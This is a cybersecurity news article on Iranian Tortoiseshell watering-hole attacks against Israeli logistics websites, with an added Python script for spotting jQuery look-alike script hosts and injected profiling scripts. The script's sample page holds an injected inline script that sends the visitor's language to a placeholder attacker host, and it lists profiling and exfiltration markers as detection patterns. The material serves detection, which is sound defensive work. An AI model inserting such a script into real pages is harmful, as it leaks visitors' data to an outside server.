Iranian Tortoiseshell Hackers Targeting Israeli Logistics Industry

May 24, 2023 | Ravi Lakshmanan | Cyber Threat / Web Security


At least eight websites associated with Israeli shipping, logistics and financial services companies were targeted as part of the watering hole attacks.

ClearSky, a Tel Aviv-based cybersecurity firm, attributes the attack with low confidence to an Iranian actor tracked as Tortoiseshell (also known as Crimson Sandstorm (formerly Curium), Imperial Kitten, and TA456).

“The infected site collects preliminary user information through a script,” ClearSky said in a technical report released Tuesday. Most of the affected websites have had their malicious code removed.

Tortoiseshell has been known to be active since at least July 2018, with early attacks targeting IT providers in Saudi Arabia. They have also been observed setting up fake recruitment websites to trick US military veterans into downloading remote access Trojans.

However, this is not the first time an Iranian activity cluster has set up a watering hole and set its sights on the Israeli shipping sector.

This technique, also known as a strategic website compromise, involves compromising websites known to be frequently visited by a particular group of users or by users within a particular industry, and then using those sites to distribute malware.


In August 2022, an emerging Iranian actor named UNC3890 was allegedly linked to a watering hole hosted on the login page of a legitimate Israeli shipping company, designed to send preliminary data about logged-in users to an attacker-controlled domain.

A recent intrusion documented by ClearSky shows malicious JavaScript injected into a website working in a similar fashion, gathering information about the system and sending it to a remote server.


The JavaScript code also attempts to determine the user’s language preference, which ClearSky said could “help an attacker customize attacks based on the user’s language.”

Additionally, the attack leverages a domain named jquery-stack[.]online for command and control (C2). The aim is to blend in by masquerading as the legitimate jQuery JavaScript framework.
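The two traits described above, an injected script that profiles the visitor and ships the data off-site, and a loader pulled from a jQuery look-alike domain, are what a site owner can check for when auditing pages for this kind of watering hole. The script below is an added example, not code from the article or from ClearSky; it scans a constructed HTML page for external script hosts that trade on the jQuery name without being an approved CDN, and for inline scripts that combine browser-profiling reads with a network call. The allowlist, the placeholder domain `jquery-stack.example` and the sample page are assumptions.

```python
import re
from urllib.parse import urlparse

# Constructed sample page (not from the article): the site's own legitimate
# jQuery include, a local script, an injected external script from a
# look-alike domain, and an injected inline profiling snippet. The domain
# "jquery-stack.example" is a placeholder modelled on the indicator's
# naming pattern, not the real C2 host.
SAMPLE_HTML = """
<html><head>
<script src="https://code.jquery.com/jquery-3.6.0.min.js"></script>
<script src="/static/app.js"></script>
<script src="https://jquery-stack.example/jquery.min.js"></script>
<script>var p={l:navigator.language};fetch("https://jquery-stack.example/c",{method:"POST",body:JSON.stringify(p)});</script>
</head><body>ok</body></html>
"""

# Hosts approved to serve jQuery for this site (assumed allowlist).
OFFICIAL_JQUERY_HOSTS = {"code.jquery.com", "ajax.googleapis.com", "cdnjs.cloudflare.com"}

SCRIPT_SRC_RE = re.compile(r'<script[^>]*\bsrc=["\']([^"\']+)["\']', re.IGNORECASE)
INLINE_SCRIPT_RE = re.compile(r'<script(?![^>]*\bsrc=)[^>]*>(.*?)</script>', re.IGNORECASE | re.DOTALL)
PROFILING_MARKERS = ("navigator.language", "navigator.userAgent", "navigator.platform")
EXFIL_MARKERS = ("XMLHttpRequest", "fetch(", "sendBeacon", "new Image")


def external_script_hosts(html):
    """Hostnames of every <script src=...> that loads from another origin."""
    hosts = []
    for src in SCRIPT_SRC_RE.findall(html):
        host = urlparse(src).hostname  # None for relative paths like /static/app.js
        if host:
            hosts.append(host.lower())
    return hosts


def flag_jquery_lookalikes(html, allowlist=OFFICIAL_JQUERY_HOSTS):
    """External script hosts that carry 'jquery' in their name but are not approved CDNs."""
    return sorted({h for h in external_script_hosts(html) if "jquery" in h and h not in allowlist})


def flag_profiling_inline_scripts(html):
    """Inline scripts that read browser/user properties and also contain a network call."""
    hits = []
    for body in INLINE_SCRIPT_RE.findall(html):
        if any(m in body for m in PROFILING_MARKERS) and any(e in body for e in EXFIL_MARKERS):
            hits.append(body.strip())
    return hits


if __name__ == "__main__":
    print("look-alike script hosts:", flag_jquery_lookalikes(SAMPLE_HTML))
    print("profiling inline scripts:", len(flag_profiling_inline_scripts(SAMPLE_HTML)))
```

Run against a page fetched from your own site, the output is a short triage list; a hit is a reason to diff the page against the deployed source, not proof of compromise on its own.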

The development comes as Israel continues to be the most prominent target for Iranian state-sponsored hacking crews. Earlier this month, Microsoft highlighted a new approach of combining “offensive cyber operations with multi-pronged influence operations to facilitate geopolitical change in line with the administration’s objectives.”
